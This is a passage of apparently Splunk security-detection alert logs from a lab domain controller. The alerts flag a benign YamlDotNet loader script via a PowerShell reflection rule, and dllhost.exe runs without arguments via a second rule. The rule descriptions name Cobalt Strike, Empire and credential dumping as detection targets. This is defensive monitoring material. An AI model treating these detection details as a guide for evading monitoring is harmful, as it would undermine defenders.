\"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664960132, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T07:16:31", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T07:16:31", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664953200, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664953200", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="5552", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664953200, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664953200", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x15b0", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664956532, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T06:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T06:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664956532, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T06:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T06:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664956532, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T06:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T06:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664956532, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-05T06:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-05T06:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664949600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664949600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="3028", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664949600, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664949600", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", 